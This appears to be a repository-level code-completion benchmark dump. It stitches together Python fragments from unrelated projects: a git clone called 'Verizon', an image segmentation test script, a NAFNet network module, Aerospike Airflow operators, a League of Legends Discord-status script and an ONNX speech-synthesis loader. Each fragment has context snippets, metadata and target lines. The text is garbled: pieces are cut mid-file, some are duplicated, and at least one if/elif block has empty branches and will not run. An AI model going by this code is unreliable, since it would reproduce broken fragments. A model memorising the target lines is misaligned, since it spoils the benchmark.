CURRENT_BUG_ID = -1
# Load spaCy English model
nlp = spacy.load("en_core_web_sm")
app = Flask(__name__, template_folder='')
# Configure
LOG_DIR = os.path.join(app.root_path, 'log')
DATA_DIR = os.path.join(app.root_path, 'data')
MODEL_DIR = os.path.join(app.root_path, 'model')
CORPUS_DIR = os.path.join(DATA_DIR, 'corpus')
GUIDANCE_DIR = os.path.join(DATA_DIR, 'guidance')
STATE_DIR = os.path.join(DATA_DIR, 'state')
std = pd.read_csv(os.path.join(CORPUS_DIR, 'std.csv'))
df = pd.merge(
pd.read_csv(os.path.join(CORPUS_DIR, 'qa.csv')),
std,
on='ID',
how='left'
)
qa = dict(zip(df['Q'], df['A']))
at = dict(zip(std['A'], std['TYPE']))
ta = dict(zip(std['TYPE'], std['A'])) | key_words = read_keywords_from_file( | 0 | 2023-12-20 09:44:09+00:00 | 2k |
yash-srivastava19/verizon | classes.py | [
{
"identifier": "kvlm_serialize",
"path": "other_utils.py",
"snippet": "def kvlm_serialize(kvlm):\n ret = b''\n\n for k in kvlm.keys():\n if k == None: continue\n val = kvlm[k]\n\n if type(val) != list:\n val = [val]\n \n for v in val:\n ret += k + b' ' + (v.replace(b'\\n ')) + b'\\n'\n \n ret += b'\\n' + kvlm[None] + b'\\n'\n\n return ret"
},
{
"identifier": "kvlm_parse",
"path": "other_utils.py",
"snippet": "def kvlm_parse(raw, start=0, dct=None):\n if not dct:\n dct = collections.OrderedDict()\n\n # We search for next space and the next line. If space appears before a newline, we have a keyword. Othewise, it's the final message, which we just read to the end of file.\n spc = raw.find(b' ', start)\n nl = raw.find(b'\\n', start)\n\n # Base Case : \n if (spc<0) or (nl<spc):\n assert nl==start \n dct[None] = raw[start+1 :]\n return dct\n \n # Recursive Case : \n key = raw[start:spc]\n end = start\n\n # Find the end of the value. We loop until we find a '\\n' followed by a space.\n while True:\n end = raw.find(b'\\n', end+1)\n if raw[end+1] != ord(' '): break \n \n value = raw[spc+1: end].replace(b'\\n ', b'\\n')\n\n if key in dct:\n if type(dct[key]) == list:\n dct[key].append(value)\n else:\n dct[key] = [dct[key], value]\n else:\n dct[key] = value \n \n return kvlm_parse(raw, start=end+1, dct=dct)"
}
] | from class_utils import *
from other_utils import kvlm_serialize, kvlm_parse | 939 |
class VerizonRepository:
worktree = None
vrzdir = None
conf = None
def __init__(self, path, force = False):
self.worktree = path
self.vrzdir = os.path.join(path, ".vrz")
if not (force or os.path.isdir(self.vrzdir)):
raise Exception(f"Not a Verizon Repository : {path}")
# Read Config file.
self.conf = configparser.ConfigParser()
cf = repo_file(self, "config")
if cf and os.path.exists(cf):
self.conf.read([cf])
elif not force:
raise Exception("Configuration File is Missing")
if not force:
vers = int(self.conf.get("core", "repositoryformatversion"))
if vers != 0:
raise Exception(f"Unsupported repositoryformatversion : {vers}")
class VerizonObject:
def __init__(self, data=None) -> None:
if data != None:
self.deserialize(data)
else:
self.init()
def serialize(self, repo):
""" Read the objects contents, and do whatever it takes to convert it into a meaningful representation. """
raise NotImplementedError
def deserialize(self, data):
raise NotImplementedError
def init(self):
pass
# Tree wrapper for a single record(a single path).
class VerizonTreeLeaf:
def __init__(self, mode, path, sha) -> None:
self.mode = mode
self.path = path
self.sha = sha
## Type Header could be one of `blob`, `commit`, `tag`, `tree`.
# Blobs are user data. The content of every file we put in git is stored as a blob.
class VerizonBlob(VerizonObject):
fmt = b'blob'
def serialize(self):
return self.blobdata
def deserialize(self, data):
self.blobdata = data
class VerizonCommit(VerizonObject):
fmt = b'commit'
def deserialize(self, data):
self.kvlm = kvlm_parse(data)
def serialize(self, repo):
|
class VerizonRepository:
worktree = None
vrzdir = None
conf = None
def __init__(self, path, force = False):
self.worktree = path
self.vrzdir = os.path.join(path, ".vrz")
if not (force or os.path.isdir(self.vrzdir)):
raise Exception(f"Not a Verizon Repository : {path}")
# Read Config file.
self.conf = configparser.ConfigParser()
cf = repo_file(self, "config")
if cf and os.path.exists(cf):
self.conf.read([cf])
elif not force:
raise Exception("Configuration File is Missing")
if not force:
vers = int(self.conf.get("core", "repositoryformatversion"))
if vers != 0:
raise Exception(f"Unsupported repositoryformatversion : {vers}")
class VerizonObject:
def __init__(self, data=None) -> None:
if data != None:
self.deserialize(data)
else:
self.init()
def serialize(self, repo):
""" Read the objects contents, and do whatever it takes to convert it into a meaningful representation. """
raise NotImplementedError
def deserialize(self, data):
raise NotImplementedError
def init(self):
pass
# Tree wrapper for a single record(a single path).
class VerizonTreeLeaf:
def __init__(self, mode, path, sha) -> None:
self.mode = mode
self.path = path
self.sha = sha
## Type Header could be one of `blob`, `commit`, `tag`, `tree`.
# Blobs are user data. The content of every file we put in git is stored as a blob.
class VerizonBlob(VerizonObject):
fmt = b'blob'
def serialize(self):
return self.blobdata
def deserialize(self, data):
self.blobdata = data
class VerizonCommit(VerizonObject):
fmt = b'commit'
def deserialize(self, data):
self.kvlm = kvlm_parse(data)
def serialize(self, repo): | return kvlm_serialize(self.kvlm) | 0 | 2023-12-18 18:53:26+00:00 | 2k |
amazon-science/c2f-seg | test_c2f_seg.py | [
{
"identifier": "load_dataset",
"path": "data/dataloader_transformer.py",
"snippet": "def load_dataset(config, args, mode):\n if mode==\"train\":\n if args.dataset==\"KINS\":\n train_dataset = Kins_Fusion_dataset(config, mode='train')\n test_dataset = Kins_Fusion_dataset(config, mode='test')\n elif args.dataset==\"COCOA\":\n train_dataset = COCOA_Fusion_dataset(config, mode='train')\n test_dataset = COCOA_Fusion_dataset(config, mode='test')\n elif args.dataset==\"Fishbowl\":\n train_dataset = FishBowl(config, mode='train')\n test_dataset = FishBowl(config, mode='test')\n elif args.dataset==\"MOViD_A\":\n train_dataset = MOViD_A(config, mode='train')\n test_dataset = MOViD_A(config, mode='test')\n return train_dataset, test_dataset \n else:\n if args.dataset==\"KINS\":\n test_dataset = KINS_Aisformer_VRSP_Intersection(config, mode='test')\n elif args.dataset==\"COCOA\":\n test_dataset = COCOA_Fusion_dataset(config, mode='test')\n elif args.dataset==\"Fishbowl\":\n test_dataset = FishBowl(config, mode='test')\n elif args.dataset==\"MOViD_A\":\n test_dataset = MOViD_A(config, mode='test')\n return test_dataset"
},
{
"identifier": "setup_logger",
"path": "utils/logger.py",
"snippet": "def setup_logger(work_dir=None, logfile_name='log.txt', logger_name='log'):\n \"\"\"Sets up logger from target work directory.\n\n The function will sets up a logger with `DEBUG` log level. Two handlers will\n be added to the logger automatically. One is the `sys.stdout` stream, with\n `INFO` log level, which will print improtant messages on the screen. The other\n is used to save all messages to file `$WORK_DIR/$LOGFILE_NAME`. Messages will\n be added time stamp and log level before logged.\n\n NOTE: If `work_dir` or `logfile_name` is empty, the file stream will be\n skipped.\n\n Args:\n work_dir: The work directory. All intermediate files will be saved here.\n (default: None)\n logfile_name: Name of the file to save log message. (default: `log.txt`)\n logger_name: Unique name for the logger. (default: `logger`)\n\n Returns:\n A `logging.Logger` object.\n\n Raises:\n SystemExit: If the work directory has already existed, of the logger with\n specified name `logger_name` has already existed.\n \"\"\"\n logger = logging.getLogger(logger_name)\n formatter = logging.Formatter(\"[%(asctime)s][%(levelname)s] %(message)s\")\n if not logger.handlers:\n logger.setLevel(logging.DEBUG)\n # Print log message with `INFO` level or above onto the screen.\n sh = logging.StreamHandler(stream=sys.stdout)\n # sh.setLevel(logging.INFO)\n sh.setLevel(logging.INFO)\n sh.setFormatter(formatter)\n logger.addHandler(sh)\n logger.propagate = False\n\n if not work_dir or not logfile_name:\n return logger\n\n if os.path.exists(work_dir):\n print(f'Work directory `{work_dir}` has already existed!')\n os.makedirs(work_dir, exist_ok=True)\n\n # Save log message with all levels in log file.\n fh = logging.FileHandler(os.path.join(work_dir, logfile_name))\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n return logger"
},
{
"identifier": "Config",
"path": "utils/utils.py",
"snippet": "class Config(object):\n def __init__(self, config_path):\n with open(config_path, 'r') as f:\n self._yaml = f.read()\n self._dict = yaml.load(self._yaml, Loader=yaml.SafeLoader)\n self._dict['path'] = os.path.dirname(config_path)\n\n def __getattr__(self, name):\n if self._dict.get(name) is not None:\n return self._dict[name]\n\n return None\n\n def print(self):\n print('Model configurations:')\n print('---------------------------------')\n print(self._yaml)\n print('')\n print('---------------------------------')\n print('')"
},
{
"identifier": "to_cuda",
"path": "utils/utils.py",
"snippet": "def to_cuda(meta, device):\n for k in meta:\n if meta[k] is not None:\n meta[k] = meta[k].to(device)\n return meta"
}
] | import os
import cv2
import time
import random
import argparse
import numpy as np
import torch
import torch.distributed as dist
from tqdm import tqdm
from shutil import copyfile
from torch.utils.data import DataLoader
from data.dataloader_transformer import load_dataset
from utils.logger import setup_logger
from utils.utils import Config, to_cuda
from src.image_model import C2F_Seg
from src.video_model import C2F_Seg | 1,546 |
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--seed', type=int, default=42)
# path
parser.add_argument('--path', type=str, required=True, help='model checkpoints path')
parser.add_argument('--check_point_path', type=str, default="../check_points", )
parser.add_argument('--vq_path', type=str, required=True, default='KINS_vqgan')
# dataset
parser.add_argument('--dataset', type=str, default="MOViD_A", help = "select dataset")
parser.add_argument('--data_type', type=str, default="image", help = "select image or video model")
parser.add_argument('--batch', type=int, default=1)
parser.add_argument("--local_rank", default=-1, type=int, help="node rank for distributed training")
args = parser.parse_args()
if args.data_type=="image":
elif args.data_type=="video":
dist.init_process_group(backend="nccl")
torch.cuda.set_device(args.local_rank)
rank = dist.get_rank()
args.path = os.path.join(args.check_point_path, args.path)
vq_model_path = os.path.join(args.check_point_path, args.vq_path)
os.makedirs(args.path, exist_ok=True)
config_path = os.path.join(args.path, 'c2f_seg_{}.yml'.format(args.dataset))
# copy config template if does't exist
if not os.path.exists(config_path):
copyfile('./configs/c2f_seg_{}.yml'.format(args.dataset), config_path)
# load config file
config = Config(config_path)
config.path = args.path
config.batch_size = args.batch
config.dataset = args.dataset
log_file = 'log-{}.txt'.format(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
|
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--seed', type=int, default=42)
# path
parser.add_argument('--path', type=str, required=True, help='model checkpoints path')
parser.add_argument('--check_point_path', type=str, default="../check_points", )
parser.add_argument('--vq_path', type=str, required=True, default='KINS_vqgan')
# dataset
parser.add_argument('--dataset', type=str, default="MOViD_A", help = "select dataset")
parser.add_argument('--data_type', type=str, default="image", help = "select image or video model")
parser.add_argument('--batch', type=int, default=1)
parser.add_argument("--local_rank", default=-1, type=int, help="node rank for distributed training")
args = parser.parse_args()
if args.data_type=="image":
elif args.data_type=="video":
dist.init_process_group(backend="nccl")
torch.cuda.set_device(args.local_rank)
rank = dist.get_rank()
args.path = os.path.join(args.check_point_path, args.path)
vq_model_path = os.path.join(args.check_point_path, args.vq_path)
os.makedirs(args.path, exist_ok=True)
config_path = os.path.join(args.path, 'c2f_seg_{}.yml'.format(args.dataset))
# copy config template if does't exist
if not os.path.exists(config_path):
copyfile('./configs/c2f_seg_{}.yml'.format(args.dataset), config_path)
# load config file
config = Config(config_path)
config.path = args.path
config.batch_size = args.batch
config.dataset = args.dataset
log_file = 'log-{}.txt'.format(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())) | logger = setup_logger(os.path.join(args.path, 'logs'), logfile_name=log_file) | 1 | 2023-12-21 04:25:47+00:00 | 2k |
Hammour-steak/GOUB | codes/models/modules/DenoisingNAFNet_arch.py | [
{
"identifier": "SinusoidalPosEmb",
"path": "codes/models/modules/module_util.py",
"snippet": "class SinusoidalPosEmb(nn.Module):\n def __init__(self, dim):\n super().__init__()\n self.dim = dim\n\n def forward(self, x):\n device = x.device\n half_dim = self.dim // 2\n emb = math.log(10000) / (half_dim - 1)\n emb = torch.exp(torch.arange(half_dim, device=device) * -emb)\n emb = x[:, None] * emb[None, :]\n emb = torch.cat((emb.sin(), emb.cos()), dim=-1)\n return emb"
},
{
"identifier": "LayerNorm",
"path": "codes/models/modules/module_util.py",
"snippet": "class LayerNorm(nn.Module):\n def __init__(self, dim):\n super().__init__()\n self.g = nn.Parameter(torch.ones(1, dim, 1, 1))\n\n def forward(self, x):\n eps = 1e-5 if x.dtype == torch.float32 else 1e-3\n var = torch.var(x, dim = 1, unbiased = False, keepdim = True)\n mean = torch.mean(x, dim = 1, keepdim = True)\n return (x - mean) * (var + eps).rsqrt() * self.g"
},
{
"identifier": "exists",
"path": "codes/models/modules/module_util.py",
"snippet": "def exists(x):\n return x is not None"
}
] | import torch
import torch.nn as nn
import torch.nn.functional as F
from einops import rearrange, reduce
from .module_util import SinusoidalPosEmb, LayerNorm, exists | 802 |
class SimpleGate(nn.Module):
def forward(self, x):
x1, x2 = x.chunk(2, dim=1)
return x1 * x2
class NAFBlock(nn.Module):
def __init__(self, c, time_emb_dim=None, DW_Expand=2, FFN_Expand=2, drop_out_rate=0.):
super().__init__()
self.mlp = nn.Sequential(
SimpleGate(), nn.Linear(time_emb_dim // 2, c * 4)
) if time_emb_dim else None
dw_channel = c * DW_Expand
self.conv1 = nn.Conv2d(in_channels=c, out_channels=dw_channel, kernel_size=1, padding=0, stride=1, groups=1, bias=True)
self.conv2 = nn.Conv2d(in_channels=dw_channel, out_channels=dw_channel, kernel_size=3, padding=1, stride=1, groups=dw_channel,
bias=True)
self.conv3 = nn.Conv2d(in_channels=dw_channel // 2, out_channels=c, kernel_size=1, padding=0, stride=1, groups=1, bias=True)
# Simplified Channel Attention
self.sca = nn.Sequential(
nn.AdaptiveAvgPool2d(1),
nn.Conv2d(in_channels=dw_channel // 2, out_channels=dw_channel // 2, kernel_size=1, padding=0, stride=1,
groups=1, bias=True),
)
# SimpleGate
self.sg = SimpleGate()
ffn_channel = FFN_Expand * c
self.conv4 = nn.Conv2d(in_channels=c, out_channels=ffn_channel, kernel_size=1, padding=0, stride=1, groups=1, bias=True)
self.conv5 = nn.Conv2d(in_channels=ffn_channel // 2, out_channels=c, kernel_size=1, padding=0, stride=1, groups=1, bias=True)
|
class SimpleGate(nn.Module):
def forward(self, x):
x1, x2 = x.chunk(2, dim=1)
return x1 * x2
class NAFBlock(nn.Module):
def __init__(self, c, time_emb_dim=None, DW_Expand=2, FFN_Expand=2, drop_out_rate=0.):
super().__init__()
self.mlp = nn.Sequential(
SimpleGate(), nn.Linear(time_emb_dim // 2, c * 4)
) if time_emb_dim else None
dw_channel = c * DW_Expand
self.conv1 = nn.Conv2d(in_channels=c, out_channels=dw_channel, kernel_size=1, padding=0, stride=1, groups=1, bias=True)
self.conv2 = nn.Conv2d(in_channels=dw_channel, out_channels=dw_channel, kernel_size=3, padding=1, stride=1, groups=dw_channel,
bias=True)
self.conv3 = nn.Conv2d(in_channels=dw_channel // 2, out_channels=c, kernel_size=1, padding=0, stride=1, groups=1, bias=True)
# Simplified Channel Attention
self.sca = nn.Sequential(
nn.AdaptiveAvgPool2d(1),
nn.Conv2d(in_channels=dw_channel // 2, out_channels=dw_channel // 2, kernel_size=1, padding=0, stride=1,
groups=1, bias=True),
)
# SimpleGate
self.sg = SimpleGate()
ffn_channel = FFN_Expand * c
self.conv4 = nn.Conv2d(in_channels=c, out_channels=ffn_channel, kernel_size=1, padding=0, stride=1, groups=1, bias=True)
self.conv5 = nn.Conv2d(in_channels=ffn_channel // 2, out_channels=c, kernel_size=1, padding=0, stride=1, groups=1, bias=True)
| self.norm1 = LayerNorm(c) | 1 | 2023-12-15 09:40:18+00:00 | 2k |
eldar-eln-bigabid/airflow-aerospike-provider | tests/operators/test_aerospike.py | [
{
"identifier": "AerospikeGetKeyOperator",
"path": "aerospike_provider/operators/aerospike.py",
"snippet": "class AerospikeGetKeyOperator(BaseOperator):\n \"\"\"\n Read an existing record(s) metadata and all of its bins for a specified key.\n\n :param namespace: namespace to use in aerospike db\n :param set: set name in the namespace\n :param key: key to get and return. can be a single key or a list of keys\n :param policy: which policy the key should be saved with. default `POLICY_KEY_SEND`\n :param aerospike_conn_id: aerospike connection to use, defaults to 'aerospike_default'\n \"\"\"\n\n template_fields: Sequence[str] = (\"key\",)\n template_ext: Sequence[str] = ()\n ui_color = \"#66c3ff\"\n\n def __init__(\n self,\n namespace: str,\n set: str,\n key: Union[List[str], str],\n policy: dict = {'key': aerospike.POLICY_KEY_SEND},\n aerospike_conn_id: str = \"aerospike_default\",\n **kwargs: Any,\n ) -> None:\n super().__init__(**kwargs)\n self.key = key\n self.namespace = namespace\n self.set = set\n self.key = key\n self.policy = policy\n self.aerospike_conn_id = aerospike_conn_id\n\n def execute(self, context: Context) -> list:\n with AerospikeHook(self.aerospike_conn_id) as hook:\n self.log.info('Fetching key')\n records = hook.get_record(key=self.key, namespace=self.namespace, set=self.set, policy=self.policy)\n parsed_records = self.parse_records(records=records)\n self.log.info('Got %s records', len(parsed_records))\n return parsed_records\n\n def parse_records(self, records: Union[List, tuple]) -> list:\n # Removing the `bytearray` object from records since object of type bytearray is not JSON serializable for Xcom.\n if isinstance(records, list):\n data = list(map(self.create_dict_from_record, records))\n elif isinstance(records, tuple):\n data = [self.create_dict_from_record(record=records)]\n else:\n raise ValueError(f\"Expecting 'list' or 'tuple', got: {type(records)}\")\n return data\n\n @staticmethod\n def create_dict_from_record(record: tuple) -> dict:\n try:\n return {\n \"namespace\": record[0][0],\n \"set\": record[0][1],\n \"key\": record[0][2],\n \"metadata\": record[1],\n \"bins\": record[2]\n }\n except IndexError:\n # Handling an error when there are no 'bins' the data\n return {\n \"namespace\": record[0][0],\n \"set\": record[0][1],\n \"key\": record[0][2],\n \"metadata\": record[1]\n }"
},
{
"identifier": "AerospikePutKeyOperator",
"path": "aerospike_provider/operators/aerospike.py",
"snippet": "class AerospikePutKeyOperator(BaseOperator):\n \"\"\"\n Create a new record, add or remove bins.\n\n This can also remove a record (if exists) using ` `{\"bin\": aerospuke.null() }`` if it's the last bin.\n\n :param key: key to save in the db.\n :param namespace: namespace to use in aerospike db\n :param set: set name in the namespace\n :param bins: bins name and data saved along with a key as key values. For example: `{\"bin\": value}`\n :param metadata: metadata about the key eg. ttl. For example: `{\"ttl\": 0}`\n :param policy: which policy the key should be saved with. default `POLICY_EXISTS_IGNORE`. ref: https://developer.aerospike.com/client/usage/atomic/update#policies\n :param aerospike_conn_id: aerospike connection to use, defaults to 'aerospike_default'\n \"\"\"\n\n template_fields: Sequence[str] = (\"key\", \"bins\", \"metadata\", )\n template_ext: Sequence[str] = ()\n ui_color = \"#66c3ff\"\n\n def __init__(\n self,\n namespace: str,\n set: str,\n key: str,\n bins: dict,\n metadata: Union[dict, Any] = None,\n policy: Dict[str, Any] = {'key': aerospike.POLICY_EXISTS_IGNORE},\n aerospike_conn_id: str = \"aerospike_default\",\n **kwargs: Any,\n ) -> None:\n super().__init__(**kwargs)\n self.key = key\n self.namespace = namespace\n self.set = set\n self.key = key\n self.bins = bins\n self.metadata = metadata\n self.policy = policy\n self.aerospike_conn_id = aerospike_conn_id\n\n def execute(self, context: Context) -> None:\n with AerospikeHook(self.aerospike_conn_id) as hook:\n self.log.info('Storing %s as key', self.key)\n hook.put(key=self.key, bins=self.bins, metadata=self.metadata, namespace=self.namespace, set=self.set, policy=self.policy)\n self.log.info('Stored key successfully')"
}
] | import unittest
import aerospike
from unittest.mock import patch, Mock
from aerospike_provider.operators.aerospike import AerospikeGetKeyOperator, AerospikePutKeyOperator | 1,541 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
class TestAerospikeGetKeyOperator(unittest.TestCase):
def setUp(self):
self.namespace = 'test_namespace'
self.set = 'test_set'
self.key = 'test_key'
self.policy = { aerospike.POLICY_KEY_SEND }
self.task_id = 'test_task'
self.metadata = {'ttl': 1000, 'gen': 4}
self.bins = {'name': 'Aerospike Test', 'version': "1.0.0"}
| #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
class TestAerospikeGetKeyOperator(unittest.TestCase):
def setUp(self):
self.namespace = 'test_namespace'
self.set = 'test_set'
self.key = 'test_key'
self.policy = { aerospike.POLICY_KEY_SEND }
self.task_id = 'test_task'
self.metadata = {'ttl': 1000, 'gen': 4}
self.bins = {'name': 'Aerospike Test', 'version': "1.0.0"}
| self.operator = AerospikeGetKeyOperator( | 0 | 2023-12-17 18:35:36+00:00 | 2k |
Its-Haze/league-rpc-linux | league_rpc_linux/kda.py | [
{
"identifier": "wait_until_exists",
"path": "league_rpc_linux/polling.py",
"snippet": "def wait_until_exists(\n url: str,\n custom_message: str = \"\",\n expected_response_code: int = 200,\n timeout: int = 30,\n n_sleep: float | int = 5, # Not needed, but good to have.\n n_total_amount: int = 20,\n startup: int = False, # Set to True on the first time it tries to poll the local api. (onGameStart)\n) -> requests.Response | None:\n \"\"\"\n Polling on the local riot api until success is returned.\n \"\"\"\n\n for _ in range(n_total_amount):\n try:\n response = requests.get(url, timeout=timeout, verify=False)\n if response.status_code != expected_response_code:\n time.sleep(n_sleep)\n continue\n break\n except (\n NewConnectionError,\n ConnectionError,\n requests.exceptions.ConnectionError,\n ):\n # These errors occur either before the api has started..\n # Or when the game has ended\n if startup:\n # Make sure we continue to poll the api during the start of a game.\n time.sleep(n_sleep)\n continue\n\n # When game ends, we don't care about polling the api.\n return None\n else:\n print(custom_message)\n return None\n return response"
},
{
"identifier": "get_summoner_name",
"path": "league_rpc_linux/username.py",
"snippet": "def get_summoner_name(with_discriminator: bool = False) -> str:\n \"\"\"\n Gets the current summoner name.\n\n if with_discriminator is True, the function will return a summoners name with #EUW / #EUNE etc\n Defaults to not include it.\n\n \"\"\"\n url = \"https://127.0.0.1:2999/liveclientdata/activeplayername\"\n if response := wait_until_exists(\n url=url,\n custom_message=\"\"\"\n Summoner name could not be found.\n Contact @haze.dev on discord, or submit a ticket on Github.\n \"\"\",\n ):\n name = str(response.json())\n return name if with_discriminator else name.split(\"#\", maxsplit=1)[0]\n\n return \"\""
}
] | import urllib3
from requests import Response
from league_rpc_linux.polling import wait_until_exists
from league_rpc_linux.username import get_summoner_name | 892 |
urllib3.disable_warnings()
def get_kda() -> str:
"""
Get the current KDA of your game.
"""
response = get_current_user_stats()
if isinstance(response, Response):
parsed_data = response.json()
kills = str(parsed_data["kills"])
deaths = str(parsed_data["deaths"])
assists = str(parsed_data["assists"])
return f"{kills}/{deaths}/{assists}"
return ""
def get_level() -> int:
"""
Get the current Level of your game.
"""
response = get_current_active_player_stats()
if isinstance(response, Response):
parsed_data = response.json()
level = int(parsed_data["level"])
return level
return 0
def get_gold() -> int:
"""
Get the current gold of your game.
"""
response = get_current_active_player_stats()
if isinstance(response, Response):
parsed_data = response.json()
gold = int(parsed_data["currentGold"])
return gold
return 0
def get_creepscore() -> str:
"""
Get the current creepScore of your live game
creepScore is updated every 10cs by Riot.
"""
response = get_current_user_stats()
if isinstance(response, Response):
parsed_data = response.json()
creep_score = str(parsed_data["creepScore"])
return f"{creep_score}cs"
return ""
def get_current_user_stats() -> Response | None:
"""
Request data from playerscores?summonerName and return the response.
"""
|
urllib3.disable_warnings()
def get_kda() -> str:
"""
Get the current KDA of your game.
"""
response = get_current_user_stats()
if isinstance(response, Response):
parsed_data = response.json()
kills = str(parsed_data["kills"])
deaths = str(parsed_data["deaths"])
assists = str(parsed_data["assists"])
return f"{kills}/{deaths}/{assists}"
return ""
def get_level() -> int:
"""
Get the current Level of your game.
"""
response = get_current_active_player_stats()
if isinstance(response, Response):
parsed_data = response.json()
level = int(parsed_data["level"])
return level
return 0
def get_gold() -> int:
"""
Get the current gold of your game.
"""
response = get_current_active_player_stats()
if isinstance(response, Response):
parsed_data = response.json()
gold = int(parsed_data["currentGold"])
return gold
return 0
def get_creepscore() -> str:
"""
Get the current creepScore of your live game
creepScore is updated every 10cs by Riot.
"""
response = get_current_user_stats()
if isinstance(response, Response):
parsed_data = response.json()
creep_score = str(parsed_data["creepScore"])
return f"{creep_score}cs"
return ""
def get_current_user_stats() -> Response | None:
"""
Request data from playerscores?summonerName and return the response.
""" | your_summoner_name = get_summoner_name() | 1 | 2023-12-15 22:21:53+00:00 | 2k |
huahuahuage/Bert-VITS2-Speech | onnx_infer/onnx_infer.py | [
{
"identifier": "log_instance",
"path": "log.py",
"snippet": "DISABLED_LOGGER = [\"gradio.processing_utils\", \"gradio\", \"httpx\"]\r"
},
{
"identifier": "read_config",
"path": "config.py",
"snippet": "def read_config(config_path:str) -> dict:\r\n \"\"\"\r\n 取读配置文件\r\n \"\"\"\r\n f = open(config_path, \"rb\")\r\n try:\r\n raw_data:str = f.read()\r\n # 检测配置文件编码\r\n char_type = chardet.detect(raw_data)['encoding']\r\n # 解码\r\n data = raw_data.decode(char_type)\r\n config_data = json.loads(data)\r\n except:\r\n config_data = {}\r\n logging.error(f\"配置文件 {config_path} 不存在或者格式错误。\")\r\n\r\n f.close()\r\n\r\n return config_data\r"
},
{
"identifier": "config_instance",
"path": "config.py",
"snippet": "CONFIG_PATH = \"config.json\"\r\ndef read_config(config_path:str) -> dict:\r\n def __init__(self) -> None:\r\n def get(self, key, default=None):\r\nclass ONNX_CONFIG:\r"
},
{
"identifier": "clean_text",
"path": "onnx_infer/text/cleaner.py",
"snippet": "def clean_text(text: str, language: str):\r\n \"\"\"\r\n 处理标点符号,并将文本转化成对应语言音标?\r\n\r\n norm_text:处理标点后的文本\r\n\r\n phones:所有文本的音标列表\r\n\r\n tones:所有文本的音调\r\n\r\n word2ph:单个字的音标个数\r\n\r\n \"\"\"\r\n try:\r\n language_text_normalize = getattr(text_normalize_instance, language)\r\n except AttributeError:\r\n raise TypeError(f\"语言类型输入错误:{language}。\")\r\n # 替换所有阿拉伯数字为对应语言,同时将符号替换为指定列表内的英文符号\r\n norm_text = language_text_normalize(text)\r\n phones, tones, word2ph = getattr(g2p_instance, language)(norm_text)\r\n return norm_text, phones, tones, word2ph\r"
},
{
"identifier": "cleaned_text_to_sequence",
"path": "onnx_infer/text/cleaner.py",
"snippet": "def cleaned_text_to_sequence(cleaned_text, tones, language):\r\n \"\"\"Converts a string of text to a sequence of IDs corresponding to the symbols in the text.\r\n Args:\r\n text: string to convert to a sequence\r\n Returns:\r\n List of integers corresponding to the symbols in the text\r\n \"\"\"\r\n phones = [symbol_to_id[symbol] for symbol in cleaned_text]\r\n tone_start = language_tone_start_map[language]\r\n tones = [i + tone_start for i in tones]\r\n lang_ids = [language_id_map[language]] * len(phones)\r\n return phones, tones, lang_ids"
}
] | import os
import numpy as np
import onnxruntime as ort
from copy import copy
from typing import List
from dataclasses import dataclass
from log import log_instance
from config import read_config
from config import config_instance
from .text.cleaner import clean_text, cleaned_text_to_sequence
from .onnx_bert import get_bert
| 1,019 |
BERT_ENABLE = config_instance.get("bert_enable", True)
if BERT_ENABLE:
# 获取模型中包含的中文角色标记
CHINESE_CHARACTER_MARK = config_instance.get("onnx_tts_models_chinese_mark", "中文")
ONNX_PROVIDERS = [config_instance.get("onnx_providers", "CPUExecutionProvider")]
MODELS_PATH = os.path.abspath(config_instance.get("onnx_tts_models", "onnx/models"))
MODELS_BASE_NAME = os.path.basename(MODELS_PATH)
MODELS_PARENT_PATH = os.path.dirname(MODELS_PATH)
MODELS_PREFIX = os.path.join(MODELS_PATH, os.path.basename(MODELS_PATH))
ONNX_MODELS_PATH = {
"config": f"{MODELS_PARENT_PATH}/{MODELS_BASE_NAME}.json",
"enc": f"{MODELS_PREFIX}_enc_p.onnx",
"emb_g": f"{MODELS_PREFIX}_emb.onnx",
"dp": f"{MODELS_PREFIX}_dp.onnx",
"sdp": f"{MODELS_PREFIX}_sdp.onnx",
"flow": f"{MODELS_PREFIX}_flow.onnx",
"dec": f"{MODELS_PREFIX}_dec.onnx",
}
class SpeakerMap:
"""
多语言关系表
"""
def __init__(self) -> None:
log_instance.info("正在加载模型发音人多语言关系表...")
|
BERT_ENABLE = config_instance.get("bert_enable", True)
if BERT_ENABLE:
# 获取模型中包含的中文角色标记
CHINESE_CHARACTER_MARK = config_instance.get("onnx_tts_models_chinese_mark", "中文")
ONNX_PROVIDERS = [config_instance.get("onnx_providers", "CPUExecutionProvider")]
MODELS_PATH = os.path.abspath(config_instance.get("onnx_tts_models", "onnx/models"))
MODELS_BASE_NAME = os.path.basename(MODELS_PATH)
MODELS_PARENT_PATH = os.path.dirname(MODELS_PATH)
MODELS_PREFIX = os.path.join(MODELS_PATH, os.path.basename(MODELS_PATH))
ONNX_MODELS_PATH = {
"config": f"{MODELS_PARENT_PATH}/{MODELS_BASE_NAME}.json",
"enc": f"{MODELS_PREFIX}_enc_p.onnx",
"emb_g": f"{MODELS_PREFIX}_emb.onnx",
"dp": f"{MODELS_PREFIX}_dp.onnx",
"sdp": f"{MODELS_PREFIX}_sdp.onnx",
"flow": f"{MODELS_PREFIX}_flow.onnx",
"dec": f"{MODELS_PREFIX}_dec.onnx",
}
